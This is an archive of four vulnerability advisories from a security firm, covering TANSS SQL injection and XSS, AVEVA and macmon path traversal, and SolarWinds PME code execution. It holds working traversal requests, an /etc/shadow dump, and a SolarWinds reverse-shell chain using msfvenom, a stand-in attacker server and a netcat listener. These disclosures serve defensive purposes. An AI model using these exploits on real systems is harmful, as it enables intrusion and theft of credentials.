Advisories Archive

Advisory: TANSS 5.8 – Multiple Vulnerabilities (SQLi, XSS)

Advisories

Author:

Jens Regel & Jens Gödde

Affected version

TANSS version 5.8.23.2 and earlier

Fixed version

TANSS 5.8.23.3

Timeline

2023-05-18 Vulnerabilities discovered
2023-05-26 Send details to vendor
2023-05-27 Vendor confirmed the vulnerability
2023-05-05 Vendor released fix
2023-07-03 CVE request
2023-07-18 CVE assigned
2023-07-21 Public disclosure

Description

During a penetration test, we identified several vulnerabilities in the TANSS 5.8 ticket system. These include 2 SQL injection vulnerabilities and a reflected cross-site scripting vulnerability. Furthermore, several libraries with already known vulnerabilities were identified, which can be exploited by attackers.

The SQL injection vulnerabilities makes it possible, for example, to read all session IDs from the table tanss.session and to set the session ID as a session cookie in the browser in order to log on in the context of another user.

[1] SQL injection

CVE ID: CVE-2023-37736
CVSS: 8.3 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L
CWE-89: Improper Neutralization of Special Elements used in an SQL Command (‚SQL Injection‘)

We have identified 2 SQL injection vulnerabilities in the HTTP GET parameters

index.php?section=stammdaten&sub=mitarbeiter_show&maID=[SQLi]
index.php?section=stammdaten&sub=domain&task=view&id=[SQLi]

These can be exploited using UNION SELECT statements to inject malicious SQL commands. The content of the table tanss.config can be read out as shown in the screenshot below. It is also possible to escalate privileges by extracting the active session IDs from the tanss.session table and then using them as session cookies to log on to TANSS in the context of another user.

Demo:

[2] Cross-site scripting

CVE ID: CVE-2023-37735
CVSS: 7.1 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N
CWE-79: Improper Neutralization of Input During Web Page Generation (‚Cross-site Scripting‘)

A reflected cross-site scripting vulnerability exists in the HTTP GET parameter index.php?section=bug&sub=[XSS]. As an example, it is possible to mislead users and obtain sensitive information using a manipulated link. In the screenshot below, the JavaScript variable SessionConfiguration.api.key embedded in the HTML code, which contains the bearer token for the TANSS API, is read out. With the additional use of the Fetch API, it would also be possible to send the API key to the attacker.

Demo:

[3] Using Components with Known Vulnerabilities

In the TANSS web application, several JavaScript libraries are integrated in outdated and vulnerable versions, which can be used to execute malicious code.

Library: PHP Mailer Version 5.2.14
URL: https://tanss/vendor/php_mailer/changelog.md
CVE ID: CVE-2016-10033, CVE-2016-10045, CVE-2017-5223, CVE-2017-11503, CVE-2018-19296, CVE-2020-13625, CVE-2021-34551, CVE-2021-3603
CWE-1395: Dependency on Vulnerable Third-Party Component

Library: jQuery 1.10.2
URL: https://tanss/ajax/jquery/jquery-1.10.2.js
CVE ID: CVE-2015-9251, CVE-2016-10707, CVE-2020-11023, CVE-2020-11022
CWE-1395: Dependency on Vulnerable Third-Party Component

Library: jQuery UI 1.10.4
URL: https://tanss/ajax/jquery/jquery-ui-1.10.4.custom.min.js
CVE ID: CVE-2021-41183, CVE-2021-41182, CVE-2021-41184, CVE-2022-31160
CWE-1395: Dependency on Vulnerable Third-Party Component

21. Juli 2023/von Jens Regel

Advisory: AVEVA InTouch Access Anywhere Secure Gateway – Path Traversal

Advisories

Title: AVEVA InTouch Access Anywhere Secure Gateway – Path Traversal

Author: Jens Regel, CRISEC IT-Security https://crisec.de

Timeline:
25.06.2021 Vulnerability discovered
25.06.2021 Send details to custfirstsupport@aveva.com
21.09.2021 Vendor response, fix is available until Q1/2022
25.09.2021 Vendor released Tech Alert TA000022335
06.09.2022 Public disclosure

CVE: CVE-2022-23854

Vendor:
AVEVA Group plc is a marine and plant engineering IT company headquartered in Cambridge, England. AVEVA software is used in many sectors, including on- and off-shore oil and gas processing, chemicals, pharmaceuticals, nuclear and conventional power generation, nuclear fuel reprocessing, recycling and shipbuilding (https://www.aveva.com).

Affected Products:
InTouch Access Anywhere Secure Gateway versions 2020 R2 and older

Details:
A security vulnerability exists in InTouch Access Anywhere Secure Gateway versions 2020 R2 and older. This is a Relative Path Traversal vulnerability which allows an unauthenticated user with network access to the Secure Gateway to read files on the system outside of the Secure Gateway web server.

Proof of Concept:

GET /AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini HTTP/1.1

HTTP/1.1 200 OK
Server: EricomSecureGateway/8.4.0.26844.*
(..)

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

Fix:
InTouch Access Anywhere Secure Gateway 2020 R2 (version 20.1.0) Hotfix
InTouch Access Anywhere Secure Gateway 2020b (version 20.0.1) Hotfix

6. September 2022/von Jens Regel

Advisory: macmon NAC – Directory Traversal

Advisories

macmon NAC – Directory Traversal

Author: Jens Regel

CVSSv3: 8.6 AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

CVE: Not assigned

CWE: https://cwe.mitre.org/data/definitions/23.html

Vulnerable version

macmon NAC before version 5.14.0.2

Timeline

01.04.2019 Vulnerability discovered
01.04.2019 Send details to security@macmon.eu
02.04.2019 Vulnerability was fixed by vendor
28.04.2020 Public disclosure

Description

The http get parameter ?__address is susceptible to a directory traversal attack. The vulnerability is exploited without prior authentication. The Apache server is running with root privileges, which also makes it possible to read out /etc/shadow.

Proof of Concept (PoC)

:~$ curl -i -k https://macmonip/login/?__address=../../../../../../../../etc/shadow
HTTP/1.1 200 OK
Date: Mon, 01 Apr 2019 13:23:44 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1094
Content-Type: text/plain;charset=UTF-8

root:!:17801:0:99999:7:::
daemon:*:17801:0:99999:7:::
bin:*:17801:0:99999:7:::
sys:*:17801:0:99999:7:::
sync:*:17801:0:99999:7:::
games:*:17801:0:99999:7:::
man:*:17801:0:99999:7:::
lp:*:17801:0:99999:7:::
mail:*:17801:0:99999:7:::
news:*:17801:0:99999:7:::
uucp:*:17801:0:99999:7:::
proxy:*:17801:0:99999:7:::
www-data:*:17801:0:99999:7:::
backup:*:17801:0:99999:7:::
list:*:17801:0:99999:7:::
irc:*:17801:0:99999:7:::
gnats:*:17801:0:99999:7:::
nobody:*:17801:0:99999:7:::
systemd-timesync:*:17801:0:99999:7:::
systemd-network:*:17801:0:99999:7:::
systemd-resolve:*:17801:0:99999:7:::
systemd-bus-proxy:*:17801:0:99999:7:::
Debian-exim:!:17801:0:99999:7:::
messagebus:*:17801:0:99999:7:::
statd:*:17801:0:99999:7:::
mysql:!:17801:0:99999:7:::
macmon:*:17801:0:99999:7:::
postfix:*:17801:0:99999:7:::
snmp:*:17801:0:99999:7:::
arpwatch:!:17801:0:99999:7:::
bind:*:17801:0:99999:7:::
freerad:*:17801:0:99999:7:::
hacluster:*:17801:0:99999:7:::
sshd:*:17801:0:99999:7:::
admin:$6$L1prUJGM$ENNXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:17920:0:99999:7:::

Fix

Fixed in version 5.14.0.2.

23. November 2021/von Jens Regel

Advisory: SolarWinds PME Cache Service – Code Execution

Advisories

SolarWinds MSP PME Cache Service – Insecure File Permissions / Code Execution

Author: Jens Regel

CVSSv3: 8.2 [CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H]

CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12608

CWE: https://cwe.mitre.org/data/definitions/276.html

Vulnerable version

SolarWinds MSP PME (Patch Management Engine) before 1.1.15

Timeline

2020-04-24 Vulnerability discovered
2020-04-27 Send details to SolarWinds PSIRT
2020-04-27 SolarWinds confirmed the vulnerability
2020-05-05 SolarWinds released PME version 1.1.15
2020-05-06 Public disclosure

Description

An error with insecure file permissions has occurred in the SolarWinds MSP Cache Service, which is part of the Advanced Monitoring Agent and can lead to code execution. The SolarWinds MSP Cache Service is typically used to get new update definition files and versions for ThirdPartyPatch.exe or SolarWinds MSP Patch Management Engine Setup. The XML file CacheService.xml in %PROGRAMDATA%\SolarWinds MSP\SolarWinds.MSP.CacheService\config\ is writable by normal users, so that the parameter SISServerURL can be changed, which controls the location of the updates. After some analysis, we were able to provide modified XML files (PMESetup_details.xml and ThirdPartyPatch_details.xml) that point to an executable file with a reverse TCP payload using our controlled SISServerURL web server for SolarWinds MSP Cache Service.

Proof of Concept (PoC)

As we can see, NTFS change permissions are set to CacheService.xml by default. Any user on the system who is in group users can change the file content. This is especially a big problem on terminal servers or multi-user systems.

PS C:\ProgramData\SolarWinds MSP\SolarWinds.MSP.CacheService\config> icacls .\CacheService.xml
.\CacheService.xml VORDEFINIERT\Benutzer:(I)(M)
                   NT-AUTORITÄT\SYSTEM:(I)(F)
                   VORDEFINIERT\Administratoren:(I)(F)

1. Modify CacheService.xml

In the xml file, the parameter SISServerURL was adjusted, which now points to a web server controlled by the attacker.

<?xml version="1.0" encoding="utf-8"?>
<Configuration>
	<CachingEnabled>True</CachingEnabled>
	<ApplianceVersion>1.1.14.2223</ApplianceVersion>
	<CacheLocation>C:\ProgramData\SolarWinds MSP\SolarWinds.MSP.CacheService\cache</CacheLocation>
	<CacheSizeInMB>10240</CacheSizeInMB>
	<SISServerURL>https://evil-attacker.example.org</SISServerURL>
	<LogLevel>5</LogLevel>
	<Proxy></Proxy>
	<ProxyEncrypt>AQAAANCMnd8BFdER(...)</ProxyEncrypt>
	<ProxyCacheService />
	<CacheFilesDeleted></CacheFilesDeleted>
	<CacheDeletedInBytes></CacheDeletedInBytes>
	<HostApplication>RMM</HostApplication>
	<CanBypassProxyCacheService>True</CanBypassProxyCacheService>
	<BypassProxyCacheServiceTimeoutSeconds>1</BypassProxyCacheServiceTimeoutSeconds>
	<ComponentUpdateMinutes>300</ComponentUpdateMinutes>
	<ComponentUpdateDelaySeconds>1</ComponentUpdateDelaySeconds>
</Configuration>

2. Payload creation

Generate an executable file, for example using msfvenom, that establishes a reverse tcp connection to the attacker and store it on the web server.

msfvenom -p windows/x64/shell_reverse_tcp lhost=x.x.x.x lport=4444 -f exe > /tmp/solarwinds-shell.exe

3. Prepare web server

Place the modified xml files (PMESetup_details.xml or ThirdPartyPatch_details.xml) on the web server in the path /ComponentData/RMM/1/, generate MD5, SHA1 and SHA256 hashes of the executable, set correct values for SizeInBytes and increase the version.

Example of PMESetup_details.xml

<ComponentDetails>
<Name>Patch Management Engine</Name>
<Description>Patch Management Engine</Description>
<MD5Checksum>7a4a78b105a1d750bc5dfe1151fb70e1</MD5Checksum>
<SHA1Checksum>3d9ed6bd44b5cf70a3fed8f511d9bc9273a1feac</SHA1Checksum>
<SHA256Checksum>
80579df2533d54fe9cbc87aed80884f6a97e1ccdd0443ce2bcb815ef59ed3d65
</SHA256Checksum>
<SizeInBytes>7168</SizeInBytes>
<DownloadURL>/ComponentData/RMM/1/solarwinds-shell.exe</DownloadURL>
<FileName>solarwinds-shell.exe</FileName>
<Architecture>x86,x64</Architecture>
<Locale>all</Locale>
<Version>1.1.14.2224</Version>
</ComponentDetails>

Example of ThirdPartyPatch_details.xml

<ComponentDetails xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<Name>Third Party Patch</Name>
<Description>
Third Party Patch application for Patch Management Engine RMM v 1 and later
</Description>
<MD5Checksum>7a4a78b105a1d750bc5dfe1151fb70e1</MD5Checksum>
<SHA1Checksum>3d9ed6bd44b5cf70a3fed8f511d9bc9273a1feac</SHA1Checksum>
<SHA256Checksum>
80579df2533d54fe9cbc87aed80884f6a97e1ccdd0443ce2bcb815ef59ed3d65
</SHA256Checksum>
<SizeInBytes>7168</SizeInBytes>
<DownloadURL>/ComponentData/RMM/1/solarwinds-shell.exe</DownloadURL>
<FileName>solarwinds-shell.exe</FileName>
<Architecture>x86,x64</Architecture>
<Locale>all</Locale>
<Version>1.2.1.95</Version>
</ComponentDetails>

4. Malicious executable download

After restarting the system or reloading the CacheService.xml, the service connects to the web server controlled by the attacker and downloads the executable file. This is then stored in the path %PROGRAMDATA%\SolarWinds MSP\SolarWinds.MSP.CacheService\cache\ and %PROGRAMDATA%\SolarWinds MSP\PME\archives\.

[24/Apr/2020:10:57:01 +0200] "HEAD /ComponentData/RMM/1/solarwinds-shell.exe HTTP/1.1" 200 5307 "-" "-"
[24/Apr/2020:10:57:01 +0200] "GET /ComponentData/RMM/1/solarwinds-shell.exe HTTP/1.1" 200 7585 "-" "-"

5. Getting shell

After a certain time the executable file is executed by SolarWinds MSP RPC Server service and establishes a connection with the rights of the system user to the attacker.

[~]: nc -nlvp 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from [x.x.x.x] port 4444 [tcp/*] accepted (family 2, sport 49980)
Microsoft Windows [Version 10.0.18363.778]
(c) 2019 Microsoft Corporation. Alle Rechte vorbehalten.

C:\WINDOWS\system32>whoami
whoami
nt-authority\system

C:\WINDOWS\system32>

Fix

There is a new PME version 1.1.15 which comes with auto-update

https://success.solarwindsmsp.com/forum-post/X0D51T00007TMk6jSAD/

19. November 2021/von Jens Regel